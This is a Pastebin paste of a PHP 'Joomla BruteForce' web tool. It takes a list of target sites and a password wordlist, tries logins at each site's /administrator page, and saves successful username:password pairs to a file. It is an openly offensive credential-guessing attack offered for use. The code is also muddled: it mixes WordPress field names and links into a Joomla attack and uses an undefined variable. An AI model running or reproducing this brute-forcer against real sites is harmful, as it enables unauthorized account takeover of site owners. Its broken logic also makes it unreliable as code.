SHARE
TWEET

Untitled

caesarevan Oct 14th, 2018 71 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. <?
  3. echo '<html>
  4. <head>
  5.     <link href="https://image.ibb.co/j9hReU/cze.png" type="image/x-icon" rel="shortcut icon" />
  6.     <meta name="author" content="CZE" />
  7.     <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
  8.     <meta name="description" content="CZE" />
  9. <title>Joomla BruteForce</title>
  10.   <style type=\'text/css\'>
  11.  input[type=submit], input[type=button], input[type=reset]{
  12.     text-align:center;
  13.     background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  14.     border:1px solid #4D4D4D;
  15.     color:#FFFFFF;
  16.     border-top-color:#565656;
  17.     padding:4px 6px;
  18.     margin:4px 5px;
  19.     height:16px;
  20.     -moz-box-shadow:0 0 1px black;
  21.     -webkit-box-shadow:0 0 1px black;
  22.     box-shadow:0 0 1px black;
  23.     text-shadow:0 1px black;
  24.     -moz-border-radius:4px;
  25.     -webkit-border-radius:4px;
  26.     -khtml-border-radius:4px;
  27.     border-radius:4px;
  28.     height:23px;
  29. }
  30.  
  31.  
  32. input[type=text], input[type=password]{
  33.     background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  34.     border:1px solid #4D4D4D;
  35.     color:#CCCCCC;
  36.     border-top-color:#565656;
  37.     -moz-box-shadow:0 0 1px black;
  38.     -webkit-box-shadow:0 0 1px black;
  39.     box-shadow:0 0 1px black;
  40.     -moz-border-radius:4px;
  41.     -webkit-border-radius:4px;
  42.     -khtml-border-radius:4px;
  43.     border-radius:4px;
  44.     height:18px;
  45.     margin-left: 5px;
  46. }
  47. input , textarea , button , body , caption , table ,area , option {
  48.     outline:none;
  49.     transition: all 0.20s ease-in-out;
  50.     -webkit-transition: all 0.25s ease-in-out;
  51.     -moz-transition: all 0.25s ease-in-out;
  52.     border-radius:3px;
  53.     -webkit-border-radius:3px;
  54.     -moz-border-radius:3px;
  55.     //border:1px solid rgba(0,0,0, 0.2);
  56.  /*   font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
  57. }
  58. input , textarea {
  59.     background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  60. }
  61.  
  62. input , textarea {
  63.     outline:none;
  64.     transition: all 0.20s ease-in-out;
  65.     -webkit-transition: all 0.25s ease-in-out;
  66.     -moz-transition: all 0.25s ease-in-out;
  67.     border-radius:3px;
  68.     -webkit-border-radius:3px;
  69.     -moz-border-radius:3px;
  70.     border:1px solid rgba(0,0,0, 0.2);
  71. }
  72. input:focus, textarea:focus {
  73.   outline: 0;
  74.   border-color: rgba(82, 168, 236, 0.8);
  75.   -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  76.   -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  77.   box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  78.  
  79.  
  80.     background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  81.     overflow: auto;
  82.  
  83. }
  84. .x1 {}
  85. .x2 {font-size:13px;
  86. background-color:green;
  87. color:black;}
  88. hr {color:white;}
  89. a {color:black;}
  90. #x5 {
  91.     font-family:tahoma;}
  92. .d1 {color :#C17E0B;
  93. font-family:tahoma;
  94. font-size:13px;
  95. font-weight:bold;}
  96. #d4 {color:#C17E0B;
  97. font-family:tahoma;
  98. font-weight:bold;}
  99.   </style>
  100.   </head>
  101. </br></br>
  102. <center><b><font >-=JOOMLA BRUTEFORCE=-</font></b><br /><br /><br />
  103. <center><b><font >Get Password from configuration.php</font></b><br /><br /><br />
  104. <style>
  105. body {
  106.     background-image:url("https://preview.ibb.co/b1sEZU/kaneki.png");
  107.     background-repeat: no-repeat;
  108.     background-size: 100% 100%;
  109.     </style>
  110. <form method="post" action="" enctype="multipart/form-data">
  111. <table width="50%" border="0">
  112. <tr><td><p ><font class="d1">User :</font>
  113. <input type="text" name="usr" value=admin size="15"> </font><br /><br /></p>
  114. </td></tr>
  115. <tr><td><font class="d1">Sites list :</font>
  116. </td><td><font class="d1" >Pass list :</font></td></tr>
  117. <tr><td>
  118. <textarea name="sites" cols="40" rows="13" ></textarea>
  119. </td><td>
  120. <textarea name="w0rds" cols="20" rows="13" >
  121. admin
  122. 123456
  123. password
  124. 102030
  125. 123123
  126. 12345
  127. 123456789
  128. pass
  129. test
  130. admin123
  131. demo
  132. !@#$%^
  133. 0
  134. 01
  135. 02
  136. 03
  137. 1
  138. 10
  139. 11
  140. 12
  141. 13
  142. 14
  143. 15
  144. 16
  145. 17
  146. 18
  147. 19
  148. 2
  149. 20
  150. 3
  151. 3com
  152. 4
  153. 5
  154. 6
  155. 7
  156. 8
  157. 9
  158. ILMI
  159. a
  160. a.auth-ns
  161. a01
  162. a02
  163. a1
  164. a2
  165. abc
  166. about
  167. ac
  168. academico
  169. acceso
  170. access
  171. accounting
  172. accounts
  173. acid
  174. activestat
  175. ad
  176. adam
  177. adkit
  178. admin
  179. administracion
  180. administrador
  181. administrator
  182. administrators
  183. admins
  184. ads
  185. adserver
  186. adsl
  187. ae
  188. af
  189. affiliate
  190. affiliates
  191. afiliados
  192. ag
  193. agenda
  194. agent
  195. ai
  196. aix
  197. ajax
  198. ak
  199. akamai
  200. al
  201. alabama
  202. alaska
  203. albuquerque
  204. alerts
  205. alpha
  206. alterwind
  207. am
  208. amarillo
  209. americas
  210. an
  211. anaheim
  212. analyzer
  213. announce
  214. announcements
  215. antivirus
  216. ao
  217. ap
  218. apache
  219. apollo
  220. app
  221. app01
  222. app1
  223. apple
  224. application
  225. applications
  226. apps
  227. appserver
  228. aq
  229. ar
  230. archie
  231. arcsight
  232. argentina
  233. arizona
  234. arkansas
  235. bd
  236. bdc
  237. be
  238. bea
  239. beta
  240. bf
  241. bg
  242. bh
  243. bi
  244. billing
  245. biz
  246. biztalk
  247. bj
  248. black
  249. blackberry
  250. blog
  251. blogs
  252. blue
  253. bm
  254. bn
  255. bnc
  256. bo
  257. bsd0
  258. bsd01
  259. bsd02
  260. bsd1
  261. bsd2
  262. bt
  263. bug
  264. buggalo
  265. bugs
  266. bugzilla
  267. build
  268. bulletins
  269. burn
  270. burner
  271. buscador
  272. buy
  273. bv
  274. bw
  275. by
  276. bz
  277. c
  278. c.auth-ns
  279. ca
  280. cache
  281. cafe
  282. calendar
  283. california
  284. call
  285. calvin
  286. canada
  287. canal
  288. canon
  289. careers
  290. catalog
  291. cc
  292. cd
  293. cdburner
  294. cdn
  295. cert
  296. certificates
  297. certify
  298. certserv
  299. certsrv
  300. cf
  301. cg
  302. cgi
  303. ch
  304. channel
  305. channels
  306. charlie
  307. charlotte
  308. chat
  309. chats
  310. chatserver
  311. check
  312. checkpoint
  313. chi
  314. chicago
  315. ci
  316. cims
  317. cincinnati
  318. cisco
  319. citrix
  320. ck
  321. cl
  322. class
  323. classes
  324. classifieds
  325. classroom
  326. cleveland
  327. clicktrack
  328. client
  329. clientes
  330. clients
  331. club
  332. clubs
  333. cluster
  334. clusters
  335. cm
  336. cmail
  337. cms
  338. cn
  339. co
  340. cocoa
  341. code
  342. coldfusion
  343. colombus
  344. colorado
  345. columbus
  346. com
  347. commerce
  348. commerceserver
  349. communigate
  350. community
  351. compaq
  352. compras
  353. con
  354. concentrator
  355. conf
  356. conference
  357. </textarea>
  358. </td></tr><tr><td>
  359. <font >
  360. <input type="submit" name="x" value="start" id="d4">
  361. </font></td></tr></table>
  362. </form></center>';
  363. @set_time_limit(0);
  364.  
  365.  
  366. if($_POST['x']){
  367.  
  368. echo "<hr>";
  369.  
  370. $sites = explode("\n",$_POST["sites"]);
  371. $w0rds = explode("\n",$_POST["w0rds"]);
  372.  
  373. $Attack = new Wordpress_brute_Force(); // Active Class
  374.  
  375.  
  376. foreach($w0rds as $pwd){
  377.  
  378. foreach($sites as $site){
  379.  
  380.  
  381. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
  382. flush();flush();
  383.  
  384. }
  385.  
  386. }
  387.  
  388. }
  389.  
  390.  
  391. # Class & Function'z
  392.  
  393. function txt_cln($value){  return str_replace(array("\n","\r"),"",$value); }
  394.  
  395. class Wordpress_brute_Force{
  396.  
  397. public function check_it($site,$user,$pass){ // print result
  398.  
  399. if(eregi('profile.php',$this->post($site,$user,$pass))){
  400.  echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/'>$site/wp-admin/</a></b></span><BR>";
  401. $f = fopen("configuration.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/\n"); fclose($f);
  402. flush();
  403. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
  404.  
  405. }  
  406.  
  407. public function post($site,$user,$pass){ // Post -> user & pass
  408. $login =$site.'/administrator';
  409. $to = $site.'/administrator';
  410. $token = $this->extract_token($site);
  411. $log = array ('Log In','دخول');
  412. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','jm-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
  413.  
  414. $curl=curl_init();
  415.  
  416. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  417. curl_setopt($curl,CURLOPT_URL,$login);
  418. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  419. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  420. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  421. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  422. curl_setopt($curl,CURLOPT_POST,1);
  423. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
  424. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  425.  
  426. $exec=curl_exec($curl);
  427. curl_close($curl);
  428. return $exec;
  429.  
  430. }
  431.  
  432. public function extract_token($site){ // get token from source for -> function post
  433.  
  434. $source = $this->get_source($site);
  435.  
  436. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
  437.  
  438. return $token[1][0];
  439.  
  440. }
  441.  
  442. public function get_source($site){ // get source for -> function extract_token
  443.  
  444. $curl=curl_init();
  445. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  446. curl_setopt($curl,CURLOPT_URL,$login);
  447. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  448. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  449. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  450. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  451. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  452.  
  453. $exec=curl_exec($curl);
  454. curl_close($curl);
  455. return $exec;
  456.  
  457. }
  458.  
  459. }
  460. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top